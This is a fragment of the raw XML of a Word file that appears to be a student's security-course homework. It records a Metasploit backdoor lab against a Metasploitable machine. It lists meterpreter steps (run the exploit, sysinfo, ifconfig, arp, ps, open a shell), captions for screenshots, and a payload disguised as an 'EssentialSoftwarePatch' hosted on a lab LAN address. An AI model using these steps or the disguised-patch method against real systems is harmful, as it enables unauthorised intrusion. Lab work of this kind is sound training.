    <w:p w14:paraId="3B133906" w14:textId="681B2087" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“exploit” to run the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BBB9D3" w14:textId="4F48160B" w:rsidR="00F31082" w:rsidRDefault="00F31082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sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to show the system information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82748C" w14:textId="6C8E2603" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“ifconfig” to show the IP addresses of the connected interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24553C59" w14:textId="0A364BDA" w:rsidR="00F31082" w:rsidRDefault="00F31082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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to show the ARP cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60089E45" w14:textId="37892C83" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to show the list of processes and to see if the malware is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64636449" w14:textId="377F054B" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“shell” to create a command shell for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EFAECCF" w14:textId="3AD54A72" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="2395DBBF" w14:textId="471BEA2E" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="14F3BE9B" w14:textId="65E3F641" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="756B136C" w14:textId="27D50115" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="31975D5E" w14:textId="16E5B7B7" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="05C5B5C9" w14:textId="0CDB8C61" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="5DA52D18" w14:textId="24BFD2FA" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="6E0D91D1" w14:textId="199FE654" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="2653F178" w14:textId="7D6350F9" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="66264C21" w14:textId="66436893" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="430FC065" w14:textId="4E54B93C" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="235304C5" w14:textId="42EAC877" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="44196156" w14:textId="1CB7ED7F" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082"/>
    <w:p w14:paraId="437A83BF" w14:textId="4E1D1E16" w:rsidR="00F31082" w:rsidRDefault="00865C6C" w:rsidP="00F31082">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDFF732" w14:textId="798A712E" w:rsidR="00F31082" w:rsidRPr="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Backdoor screenshots: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7FF044" w14:textId="23311155" w:rsidR="00E6685E" w:rsidRDefault="00F31082" w:rsidP="00F31082">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1162AB8F" wp14:editId="03E3650C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ckdoor_exploit_runnin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BF4C" w14:textId="793EC631" w:rsidR="00E6685E" w:rsidRDefault="00E6685E" w:rsidP="00F31082">
      <w:r>
        <w:t>Exploit running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78462BC6" w14:textId="77777777" w:rsidR="00E6685E" w:rsidRDefault="00E6685E" w:rsidP="00F31082"/>
    <w:p w14:paraId="575A3790" w14:textId="670D83A3" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="00F31082">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17956963" wp14:editId="610FEBC8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erpreter_resul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CF86" w14:textId="6AE4DF2B" w:rsidR="00E6685E" w:rsidRDefault="00E6685E" w:rsidP="00F31082">
      <w:r>
        <w:t xml:space="preserve">Results </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E865D" w14:textId="039901DE" w:rsidR="00E6685E" w:rsidRDefault="00E6685E" w:rsidP="00F31082">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F08505C" wp14:editId="092EE4D5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ckdoor_metasploi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5FFE" w14:textId="6C87815B" w:rsidR="00E6685E" w:rsidRDefault="00E6685E" w:rsidP="00F31082">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E6685E" w:rsidSect="006D0FD9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68421" w14:textId="77777777" w:rsidR="00E42516" w:rsidRDefault="00E42516" w:rsidP="00E518DC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="371E1FEA" w14:textId="77777777" w:rsidR="00E42516" w:rsidRDefault="00E42516" w:rsidP="00E51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4EC559" w14:textId="77777777" w:rsidR="00E42516" w:rsidRDefault="00E42516" w:rsidP="00E518DC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="60256285" w14:textId="77777777" w:rsidR="00E42516" w:rsidRDefault="00E42516" w:rsidP="00E518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D15F54" w14:textId="3F02962B" w:rsidR="00E518DC" w:rsidRDefault="00E518DC">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Hunter Donald hzd0011</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="28284D7E" w14:textId="18F491F5" w:rsidR="00E518DC" w:rsidRDefault="00E518DC">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Comp 5370 Homework2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3AF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17AC9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C5659"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5C04F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423D3B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B17682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3E0"/>
    <w:rsid w:val="000C59FA"/>
    <w:rsid w:val="00217CF5"/>
    <w:rsid w:val="005915DA"/>
    <w:rsid w:val="006425B1"/>
    <w:rsid w:val="006D0FD9"/>
    <w:rsid w:val="00865C6C"/>
    <w:rsid w:val="008F1F37"/>
    <w:rsid w:val="00960F6F"/>
    <w:rsid w:val="009F79DE"/>
    <w:rsid w:val="00C37AB0"/>
    <w:rsid w:val="00E42516"/>
    <w:rsid w:val="00E518DC"/>
    <w:rsid w:val="00E6685E"/>
    <w:rsid w:val="00F31082"/>
    <w:rsid w:val="00F90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7562FC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0C8A3A83-E0D0-9840-B4AF-E3207BC89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5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10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108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18D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18DC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E518D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518DC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00960F6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F6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192.168.1.6/hunterDonald-EssentialSoftwarePatch.elf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 donald</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>hunter donald</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2019-09-27T18:57:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-09-27T18:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-27T19:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>